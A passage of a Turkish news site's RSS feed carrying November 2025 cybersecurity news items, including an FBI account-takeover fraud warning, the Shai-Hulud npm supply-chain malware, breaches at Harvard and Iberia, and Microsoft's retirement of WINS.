<description><![CDATA[ FBI, yıl boyunca hızla artan hesap ele geçirme (ATO) dolandırıcılıklarını duyurarak finans kuruluşu çalışanı gibi davranan siber suçluların çevrimiçi bankacılık, bordro ve sağlık tasarruf hesaplarını ele geçirip milyonlarca doları kripto cüzdanlara aktardığını bildirdi. IC3’e 5.100’den fazla başvuru yapılırken, saldırıların bireyleri olduğu kadar şirketleri ve kurumları da hedef aldığı belirtildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_69270c20abf3a.webp" length="73034" type="image/jpeg"/>
<pubDate>Wed, 26 Nov 2025 17:21:50 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>fbi ato saldırıları 2025, hesap ele geçirme dolandırıcılığı, banka destek taklidi siber suçlar, kripto cüzdan para kaçırma yöntemleri</media:keywords>
<content:encoded><![CDATA[<p><br>FBI, 25 Kasım’da yayımladığı duyuruda 2025 yılı başından bu yana <strong data-start="654" data-end="715">hesap ele geçirme (ATO) dolandırıcılıklarında ciddi artış</strong> yaşandığını ve saldırıların 262 milyon doların üzerinde zarara yol açtığını açıkladı. IC3 verilerine göre Ocak 2025’ten bu yana 5.100’den fazla şikâyet alındı.</p>
<p></p>
<p data-start="877" data-end="1292"><strong data-start="877" data-end="911">Banka Personeli Gibi Arıyorlar</strong><br>FBI, saldırganların çoğunlukla banka çalışanı veya müşteri destek personeli gibi davrandığını, mesaj, e-posta veya aramalarla mağdurları kimlik bilgilerini paylaşmaya yönlendirdiğini belirtti. Bazı mağdurlar, dolandırıcıların “hesabınız silah alımında kullanıldı” gibi iddialarla paniğe sevk ettiğini ve yönlendirdikleri sahte internet sitelerine giriş yaptırdıklarını ifade etti.</p>
<p data-start="1294" data-end="1445">Siber suçlular çalınan bilgilerle hesaplara giriş yaptıktan sonra parola sıfırlama işlemi gerçekleştirerek hesapların kontrolünü tamamen ele geçiriyor.</p>
<p data-start="1447" data-end="1764"><strong data-start="1447" data-end="1493">Fonlar Hızla Kripto Cüzdanlara Aktarılıyor</strong><br>FBI açıklamasında, “Suçlular erişimi sağladıktan sonra fonlar hızla kripto cüzdanlara bağlı hesaplara aktarılıyor, bu nedenle paranın izini sürmek ve kurtarmak zorlaşıyor.” değerlendirmesi yer aldı. Birçok durumda hesap sahiplerinin hesaplarına giriş yapması engellendi.</p>
<p data-start="1766" data-end="1977">Saldırganların kullandığı sahte sitelerin, bankaların ve bordro hizmetlerinin gerçek sitelerine çok benzediği; bazı durumlarda SEO zehirleme teknikleriyle arama sonuçlarında üst sıralara taşındığı tespit edildi.</p>
<p data-start="1979" data-end="2249"><strong data-start="1979" data-end="2017">FBI’dan Güçlü Güvenlik Tavsiyeleri</strong><br>FBI, hesapların düzenli takip edilmesini, <strong data-start="2060" data-end="2092">benzersiz ve güçlü parolalar</strong>, <strong data-start="2094" data-end="2133">çok faktörlü kimlik doğrulama (MFA)</strong> kullanılması ve bankacılık sitelerine arama motoru üzerinden değil <strong data-start="2201" data-end="2215">yer imleri</strong> aracılığıyla erişilmesini önerdi.</p>
<p data-start="2251" data-end="2504">Mağdurlara ayrıca finans kuruluşlarıyla hızlıca iletişime geçerek para iadesi talep etmeleri ve <strong data-start="2347" data-end="2371">Hold Harmless Letter</strong> gibi belgeleri edinmeleri tavsiye edildi. FBI, dolandırıcılık vakalarının ic3.gov üzerinden ayrıntılı biçimde raporlanmasını istedi.</p>
<p data-start="2506" data-end="2760"><strong data-start="2506" data-end="2549">IC3 Adına Sahte Siteler de Ortaya Çıktı</strong><br>FBI, Eylül ayında da suçluların IC3 web sitesini taklit eden sahte platformlar üzerinden kullanıcıları hedef aldığını, bu sitelerin kişisel bilgi ve para talep ederek yeni mağduriyetler yarattığını açıklamıştı.</p>
<p data-start="2762" data-end="2910"><strong data-start="2762" data-end="2774"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Shai&#45;Hulud kötü amaçlı yazılımı 500’den fazla npm paketini ele geçirerek geliştirici sırlarını GitHub’a sızdıran geniş ölçekli tedarik zinciri saldırısını büyüttü</title>
<link>https://www.ajansexpres.com.tr/shai-hulud-koetu-amacli-yazilimi-500den-fazla-npm-paketini-ele-gecirerek-gelistirici-sirlarini-githuba-sizdiran-genis-oelcekli-tedarik-zinciri-saldirisini-buyuttu</link>
<guid>https://www.ajansexpres.com.tr/shai-hulud-koetu-amacli-yazilimi-500den-fazla-npm-paketini-ele-gecirerek-gelistirici-sirlarini-githuba-sizdiran-genis-oelcekli-tedarik-zinciri-saldirisini-buyuttu</guid>
<description><![CDATA[ Zapier, ENS Domains, PostHog ve Postman gibi popüler projelerin trojanlanmış sürümlerinin npm’e yüklenmesiyle başlayan Shai-Hulud kampanyası kısa sürede binlerce pakete yayıldı. Zararlı yazılım, geliştirici ortamlarındaki GitHub, npm ve bulut sağlayıcılarına ait gizli anahtarları toplayıp GitHub’da otomatik oluşturulan deposunda paylaşıyor. Araştırmacılar 27 binden fazla kötü amaçlı depo tespit ederken, saldırının yüzlerce maintainer hesabını ele geçirerek hızla büyüdüğü belirtiliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_69270c0088b1a.webp" length="5724" type="image/jpeg"/>
<pubDate>Wed, 26 Nov 2025 17:21:16 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>shai hulud npm saldırısı, geliştirici sırları github sızıntısı, trojanlanmış npm paketleri listesi, ci cd ortamı gizli anahtar tehlikesi</media:keywords>
<content:encoded><![CDATA[<p><br>Shai-Hulud adlı kötü amaçlı yazılım, hafta sonu boyunca npm kayıtlarında hızla çoğalarak 500’e yakın popüler paketin trojanlanmış sürümlerini platforma yükledi. Saldırı, geliştiricilerin ve CI/CD ortamlarının gizli anahtarlarını hedef alıyor ve çalınan veriler GitHub’a kodlanmış biçimde aktarılıyor.</p>
<p></p>
<p data-start="1003" data-end="1447"><strong data-start="1003" data-end="1057">Binlerce Pakete Sıçrayan Tedarik Zinciri Saldırısı</strong><br>Aikido Security araştırmacısı <strong data-start="1088" data-end="1107">Charlie Eriksen</strong>, kampanyayı ilk fark ettiğinde 105 trojanlanmış paket olduğunu, ancak kısa sürede bu sayının 492’ye ulaştığını belirtti. Wiz ekibi daha sonra kampanyanın 27.000’i aşan kötü amaçlı paket ve <strong data-start="1297" data-end="1334">350’den fazla maintainer hesabını</strong> içerdiğini açıkladı. Wiz, “Son saatlerde her 30 dakikada 1.000 yeni depo ekleniyor.” değerlendirmesinde bulundu.</p>
<p data-start="1449" data-end="1555">GitHub’da, sızdırılmış sırların yer aldığı <strong data-start="1492" data-end="1512">27.600’den fazla</strong> depo girişinin tespit edildiği bildirildi.</p>
<p data-start="1557" data-end="1849"><strong data-start="1557" data-end="1591">Yeni Yük İki Dosyadan Oluşuyor</strong><br>CI/CD güvenlik firması Step Security’nin teknik analizine göre yeni Shai-Hulud varyantının yükü iki dosyada bulunuyor:<br data-start="1710" data-end="1713">• <strong data-start="1715" data-end="1731">setup_bun.js</strong> – Bun yükleyicisi gibi davranan bir dropper<br data-start="1775" data-end="1778">• <strong data-start="1780" data-end="1802">bun_environment.js</strong> – 10 MB’lık, ağır gizlenmiş kod içeren ana yük</p>
<p data-start="1851" data-end="2125">Analizde, büyük bir hex kod dizisi, anti-analiz döngüsü ve zincirli gizleme fonksiyonları içeren karmaşık yapılar bulundu. Malware, beş aşamalı yürütme sırasında GitHub ve npm token’ları ile AWS, GCP ve Azure gibi bulut sağlayıcılarına ait sırları toplayıp dışarı aktarıyor.</p>
<p data-start="2127" data-end="2458"><strong data-start="2127" data-end="2165">Yıkıcı Son Adım: Ev Dizinini Silme</strong><br>Koi Security, zararlı yazılımın belirli koşullar oluştuğunda kurbanın <strong data-start="2236" data-end="2270">ev klasörünü tamamen sildiğini</strong> doğruladı. Silme işleminin, zararlının GitHub’a bağlanamaması, depo oluşturamaması veya token elde edememesi gibi dört koşuldan birinin gerçekleşmesi durumunda devreye girdiği belirtildi.</p>
<p data-start="2460" data-end="2840"><strong data-start="2460" data-end="2538">Sırların GitHub’da ‘Sha1-Hulud: The Second Coming’ Depolarına Gönderilmesi</strong><br>Wiz’in aktardığına göre çalınan sırlar GitHub’da otomatik açılan, açıklamasında <strong data-start="2619" data-end="2654">“Sha1-Hulud: The Second Coming”</strong> yazan depolara yükleniyor. Zararlı yazılım yükleme aşaması öncesinde çalışıyor ve şu dosyaları oluşturuyor:<br data-start="2762" data-end="2765">• cloud.json<br data-start="2777" data-end="2780">• contents.json<br data-start="2795" data-end="2798">• environment.json<br data-start="2816" data-end="2819">• truffleSecrets.json</p>
<p data-start="2842" data-end="2976">Geliştiricilere ait bazı GitHub hesaplarının da tehdit aktörü tarafından ele geçirilerek depo oluşturmak için kullanıldığı doğrulandı.</p>
<p data-start="2978" data-end="3294"><strong data-start="2978" data-end="3032">Zapier, ENS Domains ve PostHog Paketleri Etkilendi</strong><br>Aikido’nun analizinde <strong data-start="3055" data-end="3065">Zapier</strong>, <strong data-start="3067" data-end="3082">ENS Domains</strong>, <strong data-start="3084" data-end="3095">PostHog</strong> ve <strong data-start="3099" data-end="3111">AsyncAPI</strong> gibi projelere ait çeşitli paketlerin yeni Shai-Hulud sürümüyle trojanlandığı belirtildi. Özellikle Zapier geliştirici araçları ve ENS altyapı kütüphanelerinin etkilendiği duyuruldu.</p>
<p data-start="3296" data-end="3443">npm, bazı paketlerde son sürüm için “yetkisiz yayın” uyarısı göstermeye başladı ancak trojanlanmış sürümlerin hâlâ indirilebilir olduğu bildirildi.</p>
<p data-start="3445" data-end="3846"><strong data-start="3445" data-end="3483">Geliştiricilere Acil Eylem Çağrısı</strong><br>Araştırmacılar, geliştiricilere aşağıdaki adımları <strong data-start="3535" data-end="3545">derhâl</strong> uygulamalarını öneriyor:<br data-start="3570" data-end="3573">• Etkilenen paketleri tespit edip güvenli sürümlere dönmek<br data-start="3631" data-end="3634">• GitHub, npm ve bulut sağlayıcılarına ait tüm token’ları döndürmek<br data-start="3701" data-end="3704">• CI ortamlarında mümkünse <strong data-start="3731" data-end="3750">npm postinstall</strong> script’lerini devre dışı bırakmak<br data-start="3784" data-end="3787">• Bağımlılık güvenliği için otomatik taramaları genişletmek</p>
<p data-start="3848" data-end="3948">GitHub zararlı depoları kaldırırken tehdit aktörünün aynı hızla yenilerini oluşturduğu belirtiliyor.</p>
<p data-start="3950" data-end="4101"><strong data-start="3950" data-end="3962"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Harvard Üniversitesi sesli oltalama saldırısıyla çözülerek mezunlar, bağışçılar ve öğrencileri kapsayan geniş ölçekli veri ihlalini doğruladı</title>
<link>https://www.ajansexpres.com.tr/harvard-universitesi-sesli-oltalama-saldirisiyla-coezulerek-mezunlar-bagiscilar-ve-oegrencileri-kapsayan-genis-oelcekli-veri-ihlalini-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/harvard-universitesi-sesli-oltalama-saldirisiyla-coezulerek-mezunlar-bagiscilar-ve-oegrencileri-kapsayan-genis-oelcekli-veri-ihlalini-dogruladi</guid>
<description><![CDATA[ Harvard University, Mezun İlişkileri ve Bağış Geliştirme birimine ait bilgi sistemlerine telefon temelli oltalama saldırısıyla yetkisiz erişim sağlandığını açıkladı. Üniversite; öğrenciler, mezunlar, bağışçılar, çalışanlar ve bazı aile bireylerine ait iletişim bilgileri, etkinlik kayıtları ve bağış detaylarının açığa çıkmış olabileceğini bildirdi. Sosyal güvenlik numaraları, ödeme verileri ve şifrelerin ise etkilenen sistemlerde bulunmadığı belirtildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_69270c19de2fa.webp" length="34474" type="image/jpeg"/>
<pubDate>Wed, 26 Nov 2025 17:20:50 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>harvard veri ihlali 2025, harvard sesli oltalama saldırısı, alumni affairs breach, bağışçı bilgileri sızdırıldı</media:keywords>
<content:encoded><![CDATA[<p><br>Harvard University, hafta sonu yaptığı açıklamada <strong data-start="697" data-end="731">Alumni Affairs and Development</strong> sistemlerine 18 Kasım 2025’te gerçekleştirilen sesli oltalama saldırısıyla yetkisiz erişim sağlandığını doğruladı. Üniversite, olayın ardından ilgili kişilere 22 Kasım’da veri ihlali bildirimleri göndermeye başladı.</p>
<p></p>
<p data-start="949" data-end="1421"><strong data-start="949" data-end="978">Geniş Bir Kitle Etkilendi</strong><br>Ivy League üyesi Harvard’ın verdiği bilgilere göre, açığa çıkan veri seti <strong data-start="1053" data-end="1245">e-posta adresleri, telefon numaraları, ev ve iş adresleri, etkinlik katılım kayıtları, bağış bilgileri ve üniversitenin mezun ilişkileri çalışmaları kapsamında tutulan biyografik detayları</strong> içeriyor. Etkilenen gruplar arasında mezunlar, mezun eşleri veya partnerleri, bağışçılar, mevcut ve eski öğrenci velileri, bazı öğrenciler ve üniversite çalışanları bulunuyor.</p>
<p data-start="1423" data-end="1880"><strong data-start="1423" data-end="1463">“Saldırganın Erişimi Derhâl Kesildi”</strong><br>Harvard’ın Bilgi Sistemleri Sorumlusu <strong data-start="1502" data-end="1521">Klara Jelinkova</strong> ile Mezun İlişkileri ve Geliştirme Başkan Yardımcısı <strong data-start="1575" data-end="1589">Jim Husson</strong>, “Yetkisiz erişim tespit edilir edilmez saldırganın sistemlere erişimi kaldırıldı ve yeniden erişim girişimlerini engelleyecek adımlar atıldı.” açıklamasını yaptı. İkilinin aktardığına göre etkilenen sistemlerde sosyal güvenlik numarası, şifre, ödeme kartı veya finansal bilgi bulunmuyordu.</p>
<p data-start="1882" data-end="1984">Üniversite, soruşturmayı kolluk kuvvetleri ve bağımsız siber güvenlik uzmanlarıyla birlikte yürütüyor.</p>
<p data-start="1986" data-end="2314"><strong data-start="1986" data-end="2026">Kullanıcılara Dolandırıcılık Uyarısı</strong><br>Harvard, veri ihlali olasılığı bulunan kişilere gönderdiği yazıda, üniversite adına gelen şüpheli çağrı, mesaj veya e-posta taleplerine karşı dikkatli olunması gerektiğini vurguladı. Yetkililer, özellikle parola sıfırlama veya kimlik bilgisi isteyen iletilere karşı dikkat çağrısı yaptı.</p>
<p data-start="2316" data-end="2771"><strong data-start="2316" data-end="2360">Cl0p Saldırı İddiası ile Zaman Çakışması</strong><br>Harvard, Ekim ortasında da Cl0p fidye yazılımı grubu tarafından Oracle E-Business Suite sıfır gün açığı kullanılarak sızıldığını iddia eden bir veri sızıntısı listesine eklenmişti. Üniversite, o olayla ilgili soruşturmanın da sürdüğünü açıklamıştı. Princeton University ve University of Pennsylvania’nın benzer bağışçı veri ihlallerini doğrulaması, Ivy League kurumlarının art arda hedef alındığını gösteriyor.</p>
<p data-start="2773" data-end="2953"><strong data-start="2773" data-end="2812">Kaç Kişinin Etkilendiği Açıklanmadı</strong><br>Harvard sözcüsü, kaç kişinin bilgilerinin sızmış olabileceğine dair bir sayı paylaşamazken, araştırmanın ilerledikçe netleşeceğini belirtti.</p>
<p data-start="2955" data-end="3081"><strong data-start="2955" data-end="2967"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft Windows Server 2025 sonrası WINS desteğini tamamen kaldıracağını duyurarak kuruluşları DNS tabanlı çözümlere geçiş için uyardı</title>
<link>https://www.ajansexpres.com.tr/microsoft-windows-server-2025-sonrasi-wins-destegini-tamamen-kaldiracagini-duyurarak-kuruluslari-dns-tabanli-coezumlere-gecis-icin-uyardi</link>
<guid>https://www.ajansexpres.com.tr/microsoft-windows-server-2025-sonrasi-wins-destegini-tamamen-kaldiracagini-duyurarak-kuruluslari-dns-tabanli-coezumlere-gecis-icin-uyardi</guid>
<description><![CDATA[ Microsoft, ağ ad çözümlemesinde kullanılan köklü Windows Internet Name Service (WINS) desteğini Windows Server 2025’ten sonraki tüm sürümlerden kaldıracağını açıkladı. WINS, 2021’de Windows Server 2022 ile resmen kullanım dışı ilan edilmişti. Şirket, 2034’e kadar standart desteğin süreceğini ancak kurumların NetBIOS bağımlı sistemlerini hemen DNS tabanlı çözümlere taşıması gerektiğini vurguladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_69270c1459453.webp" length="62558" type="image/jpeg"/>
<pubDate>Wed, 26 Nov 2025 17:20:34 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>microsoft wins kaldırılıyor, windows server 2025 wins desteği, netbios dns geçişi, wins neden kaldırılıyor</media:keywords>
<content:encoded><![CDATA[<p><br>Microsoft, 24 Kasım’da yaptığı açıklamada <strong data-start="626" data-end="666">Windows Internet Name Service (WINS)</strong> işlevinin Windows Server 2025 ile son kez tam destekle sunulacağını, bu sürümün yaşam döngüsünün sona ereceği Kasım 2034’ten sonra ise tamamen kaldırılacağını bildirdi. WINS, özellikle eski uygulamaların NetBIOS isim çözümlemesi için kullandığı bir servis olarak biliniyor.</p>
<p></p>
<p data-start="942" data-end="1299"><strong data-start="942" data-end="984">WINS 2022’de Kullanım Dışı İlan Edildi</strong><br>WINS, Ağustos 2021’de yayımlanan Windows Server 2022 ile resmen <strong data-start="1049" data-end="1060">depreke</strong> edilmiş, bu tarihten sonra yeni özellik geliştirilmeyeceği açıklanmıştı. Microsoft, “WINS, Windows Server 2022’den bu yana kullanım dışı durumdadır ve Windows Server 2025’in ardından tüm sürümlerden kaldırılacaktır.” ifadelerini kullandı.</p>
<p data-start="1301" data-end="1483">Açıklamaya göre kaldırma süreci devreye girdikten sonra <strong data-start="1357" data-end="1450">WINS server rolü, yönetim konsolu snap-in’i, otomasyon API’leri ve ilgili tüm arabirimler</strong> işletim sisteminden çıkarılacak.</p>
<p data-start="1485" data-end="1823"><strong data-start="1485" data-end="1511">DNS’e Geçiş İçin Çağrı</strong><br>Microsoft, kurumların NetBIOS tabanlı ad çözümlemesine olan bağımlılıklarını hızla sonlandırması gerektiğini belirtti. Şirket, DNS’in modern internet standartlarına uygunluğu, ölçeklenebilirliği ve <strong data-start="1710" data-end="1720">DNSSEC</strong> desteği sayesinde önbellek zehirleme ve sahtecilik saldırılarına karşı güvenlik sağladığını vurguladı.</p>
<p data-start="1825" data-end="1945">Ayrıca Active Directory, bulut hizmetleri ve modern Windows API’lerinin tamamının DNS odaklı çalıştığına dikkat çekildi.</p>
<p data-start="1947" data-end="2235"><strong data-start="1947" data-end="1977">Kapsamlı Denetim Tavsiyesi</strong><br>Kuruluşlara, WINS’e bağlı çalışan tüm uygulamaları ve servisleri <strong data-start="2043" data-end="2066">hemen denetlemeleri</strong> önerildi. Microsoft, geçiş için <strong data-start="2099" data-end="2159">koşullu yönlendirmeler, split-brain DNS yapılandırmaları</strong> ve <strong data-start="2163" data-end="2188">arama sonek listeleri</strong> gibi yöntemlerin kullanılabileceğini belirtti.</p>
<p data-start="2237" data-end="2383">Şirket, geçici çözüm olarak kullanılan <strong data-start="2276" data-end="2305">statik hosts dosyalarının</strong> kurumsal yapılarda sürdürülebilir olmadığını ve ölçeklenemediğini ifade etti.</p>
<p data-start="2385" data-end="2726"><strong data-start="2385" data-end="2424">“Geçiş Planlaması İçin Doğru Zaman”</strong><br>Microsoft açıklamasında, “Bağımlılıkların gözden geçirilmesi, DNS geçiş planlarının değerlendirilmesi ve doğru adımların atılması için artık uygun zamandayız.” değerlendirmesi yer aldı. Kurumlara, hizmet kesintilerinden kaçınmak için <strong data-start="2659" data-end="2709">WINS sonrası döneme hazırlığı geciktirmemeleri</strong> çağrısı yapıldı.</p>
<p data-start="2728" data-end="2849"><strong data-start="2728" data-end="2740"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Google Pixel 10 cihazlarında Quick Share ile Apple AirDrop arasında çift yönlü dosya paylaşımını etkinleştirerek ekosistemler arası iletişim engelini kaldırdı</title>
<link>https://www.ajansexpres.com.tr/google-pixel-10-cihazlarinda-quick-share-ile-apple-airdrop-arasinda-cift-yoenlu-dosya-paylasimini-etkinlestirerek-ekosistemler-arasi-iletisim-engelini-kaldirdi</link>
<guid>https://www.ajansexpres.com.tr/google-pixel-10-cihazlarinda-quick-share-ile-apple-airdrop-arasinda-cift-yoenlu-dosya-paylasimini-etkinlestirerek-ekosistemler-arasi-iletisim-engelini-kaldirdi</guid>
<description><![CDATA[ Google, Android’in Quick Share sistemi ile Apple’ın AirDrop teknolojisini ilk kez birlikte çalışabilir hâle getirdiğini duyurdu. Yeni özellik başlangıçta yalnızca Pixel 10 serisinde kullanılabilirken, ilerleyen dönemde diğer Android cihazlara da yayılacak. Şirket, fotoğraf ve dosya aktarımının artık iki yönlü olarak iPhone ve Pixel cihazları arasında yapılabileceğini, sistemin güvenlik testlerinden geçtiğini ve Rust tabanlı tasarımın bellek güvenliği sorunlarını ortadan kaldırdığını açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_69270c0f701eb.webp" length="15776" type="image/jpeg"/>
<pubDate>Wed, 26 Nov 2025 17:19:47 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>quick share airdrop birlikte çalışabilirlik, pixel 10 iphone dosya paylaşımı, google rust bellek güvenliği, airdrop everyone for 10 minutes modu</media:keywords>
<content:encoded><![CDATA[<p><br>Google, Android’in yerleşik kablosuz dosya aktarım teknolojisi Quick Share ile Apple’ın AirDrop sistemi arasında birlikte çalışabilirlik sağlandığını duyurdu. Böylece Pixel 10 serisi kullanıcıları ilk kez iPhone cihazlarla doğrudan dosya gönderip alabilecek.</p>
<p></p>
<p data-start="965" data-end="1315"><strong data-start="965" data-end="1022">Pixellerde Başladı, Diğer Android Cihazlara Yayılacak</strong><br>Quick Share, Bluetooth veya Wi-Fi Direct üzerinden içerik aktarımı yapan sistem olarak bilinirken AirDrop, bugüne kadar yalnızca Apple cihazları arasında çalışıyordu. Google, Pixel 10 ailesiyle başlayan sürecin yakında diğer Android üreticilerinin cihazlarına da genişletileceğini ifade etti.</p>
<p data-start="1317" data-end="1520">Duyuruda, “Platformlar arası iletişimi kullanıcılar için daha sorunsuz hâle getirme çalışmalarımızın bir parçası olarak Quick Share’i AirDrop ile birlikte çalışabilir hâle getirdik.” açıklaması yer aldı.</p>
<p data-start="1522" data-end="1848"><strong data-start="1522" data-end="1549">Güvenlik Odaklı Tasarım</strong><br>Google, yeni sistemin güvenlik mimarisinin titizlikle oluşturulduğunu, tehdit modellemeleri, iç güvenlik incelemeleri ve sızma testlerinden geçtiğini belirtti. Siber güvenlik firması <strong data-start="1733" data-end="1743">NetSPI</strong> tarafından yapılan bağımsız denetimde de veri sızıntısına yol açacak bir zafiyet bulunmadığı doğrulandı.</p>
<p data-start="1850" data-end="2041">Şirket, kablosuz veri paketlerinin ayrıştırılmasında <strong data-start="1903" data-end="1931">Rust programlama dilinin</strong> kullanıldığını, bu yaklaşımın “bellek güvenliği açıklarını tasarımsal olarak ortadan kaldırdığını” vurguladı.</p>
<p data-start="2043" data-end="2366"><strong data-start="2043" data-end="2108">AirDrop’un ‘10 Dakika Boyunca Herkese Açık’ Modu Kullanılıyor</strong><br>İlk aşamada bağlantı, AirDrop’un doğrudan cihazdan cihaza çalışan “Everyone for 10 minutes” modu üzerinden kuruluyor. Bu modda aktarım, herhangi bir sunucu aracılığı olmadan gerçekleştiği için kayıt tutulabilecek herhangi bir ara noktaya ihtiyaç duyulmuyor.</p>
<p data-start="2368" data-end="2575">Kullanıcılara, ekranda görünen cihazın gerçekten iletişim kurmak istedikleri cihaz olduğundan emin olmaları gerektiği hatırlatıldı. Google, yanlış cihaza dosya gönderme ihtimaline karşı dikkat çağrısı yaptı.</p>
<p data-start="2577" data-end="2882"><strong data-start="2577" data-end="2610">Sıradaki Hedef: Contacts Only</strong><br>Google, Apple ile süren iş birliğinin bir sonraki adımının AirDrop’un yalnızca kayıtlı kişilerle paylaşım yapan “Contacts Only” modunun Android’e açılması olduğunu ifade etti. Apple’ın bu konuda nasıl bir yaklaşım sergileyeceğine ilişkin sorulara ise henüz yanıt gelmedi.</p>
<p data-start="2884" data-end="3043"><strong data-start="2884" data-end="2896"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>İspanyol hava yolu Iberia tedarikçi kaynaklı güvenlik ihlali sonrası müşteri verilerinin sızdığını doğruladı</title>
<link>https://www.ajansexpres.com.tr/ispanyol-hava-yolu-iberia-tedarikci-kaynakli-guvenlik-ihlali-sonrasi-musteri-verilerinin-sizdigini-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/ispanyol-hava-yolu-iberia-tedarikci-kaynakli-guvenlik-ihlali-sonrasi-musteri-verilerinin-sizdigini-dogruladi</guid>
<description><![CDATA[ İspanya’nın bayrak taşıyıcı hava yolu Iberia, bir tedarikçisinin sistemlerine yetkisiz erişim sağlanması sonucu bazı müşteri bilgilerinin açığa çıktığını bildirerek kullanıcılara e-posta yoluyla uyarı gönderdi. Şirket, ad-soyad, e-posta adresi ve sadakat programı numarası gibi bilgilerin etkilenebileceğini duyurdu. Açıklama, geçtiğimiz hafta bir tehdit aktörünün 77 GB’lık veriyi satışa çıkardığını iddia etmesinin ardından geldi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_69270c0a41723.webp" length="37584" type="image/jpeg"/>
<pubDate>Wed, 26 Nov 2025 17:19:28 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>iberia müşteri verisi sızıntısı, iberia tedarikçi güvenlik ihlali, iberia club numarası sızdırıldı, 77 gb iberia veri satışı iddiası</media:keywords>
<content:encoded><![CDATA[<p><br>İspanya’nın en büyük hava yolu şirketi <strong data-start="629" data-end="639">Iberia</strong>, bir tedarikçisinin sistemlerinde meydana gelen güvenlik ihlali nedeniyle bazı müşteri bilgilerinin yetkisiz kişilerin erişimine maruz kaldığını açıkladı. İhlal, şirketin ilgili kullanıcılara gönderdiği bilgilendirme e-postasıyla doğrulandı.</p>
<p></p>
<p data-start="883" data-end="1198"><strong data-start="883" data-end="910">Hangi Veriler Etkilendi</strong><br>Iberia tarafından paylaşılan bilgilere göre açığa çıkmış olabilecek veriler arasında <strong data-start="996" data-end="1085">müşterinin adı ve soyadı, e-posta adresi ve Iberia Club sadakat kartı kimlik numarası</strong> bulunuyor. Şirket, hesap şifreleri ile ödeme veya banka kartı bilgilerinin etkilenmediğini net biçimde belirtti.</p>
<p data-start="1200" data-end="1617"><strong data-start="1200" data-end="1249">“Güvenlik Protokollerini Hemen Devreye Aldık”</strong><br>Şirketten gönderilen güvenlik bildiriminde, “Olayı öğrenir öğrenmez güvenlik protokollerimizi devreye aldık, etkilerini azaltmak ve tekrarını önlemek için teknik ve organizasyonel tüm tedbirleri uyguladık.” ifadeleri yer aldı. Iberia, müşteri hesaplarına bağlı e-posta adreslerinde değişiklik yapılmadan önce artık doğrulama kodu zorunluluğu getirildiğini de duyurdu.</p>
<p data-start="1619" data-end="1793">Şirket, sistemlerinde olağan dışı hareketliliğin takip edildiğini, yetkili kurumların bilgilendirildiğini ve soruşturmanın tedarikçi ile koordineli biçimde sürdüğünü aktardı.</p>
<p data-start="1795" data-end="2168"><strong data-start="1795" data-end="1833">Dolandırıcılık Belirtisi Görülmedi</strong><br>Paylaşılan e-postada, “Bu iletişim tarihine kadar verilerin dolandırıcılık amacıyla kullanıldığına dair herhangi bir bulguya ulaşmadık.” denildi. Iberia ayrıca müşterilere şüpheli iletişimleri dikkatle değerlendirmeleri ve anormal bir durum fark etmeleri halinde +34 900111500 numaralı çağrı merkezine bildirmeleri çağrısında bulundu.</p>
<p data-start="2170" data-end="2544"><strong data-start="2170" data-end="2207">77 GB Veri Satış İddiası Gündemde</strong><br>Sızma iddiaları, bir tehdit aktörünün yaklaşık bir hafta önce karanlık ağ forumlarında <strong data-start="2295" data-end="2425">Iberia’ya ait olduğunu öne sürdüğü 77 GB’lık veri paketini 150.000 dolara satışa çıkardığını duyurmasının ardından yoğunlaştı.</strong> İlan üzerinde A320/A321 teknik bilgileri, bakım dosyaları, motor verileri ve iç yazışmaların bulunduğu belirtiliyordu.</p>
<p data-start="2546" data-end="2830">Ancak bu iddiada müşteri bilgilerinden söz edilmemesi ve sızıntının “Iberia’nın iç sunucularından elde edildiği” şeklindeki ifadelerin şirket açıklamasıyla çelişmesi, iki olayın bağlantısına dair belirsizliği artırdı. Iberia, yaşanan ihlalin bir tedarikçide gerçekleştiğini vurguladı.</p>
<p data-start="2832" data-end="2993">BleepingComputer tarafından ilan edilen verinin doğruluğu bağımsız olarak teyit edilemedi. Iberia’nın basın ekibine yöneltilen soruların yanıtlanması bekleniyor.</p>
<p data-start="2995" data-end="3247"><strong data-start="2995" data-end="3045">Müşterilere Uyarı: Bilinmeyen Mesajlara Dikkat</strong><br>Uzmanlar, bu tür durumlarda kimlik avı ve sosyal mühendislik girişimlerinin artabileceğini belirterek Iberia müşterilerini istenmeyen veya şirketi taklit eden mesajlara karşı dikkatli olmaya çağırıyor.</p>
<p data-start="3249" data-end="3396"><strong data-start="3249" data-end="3261"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>WhatsApp’ta hız sınırı olmayan API açığı araştırmacıların 3,5 milyar hesabı doğrulamasına imkân tanıdı</title>
<link>https://www.ajansexpres.com.tr/whatsappta-hiz-siniri-olmayan-api-acigi-arastirmacilarin-35-milyar-hesabi-dogrulamasina-imkan-tanidi</link>
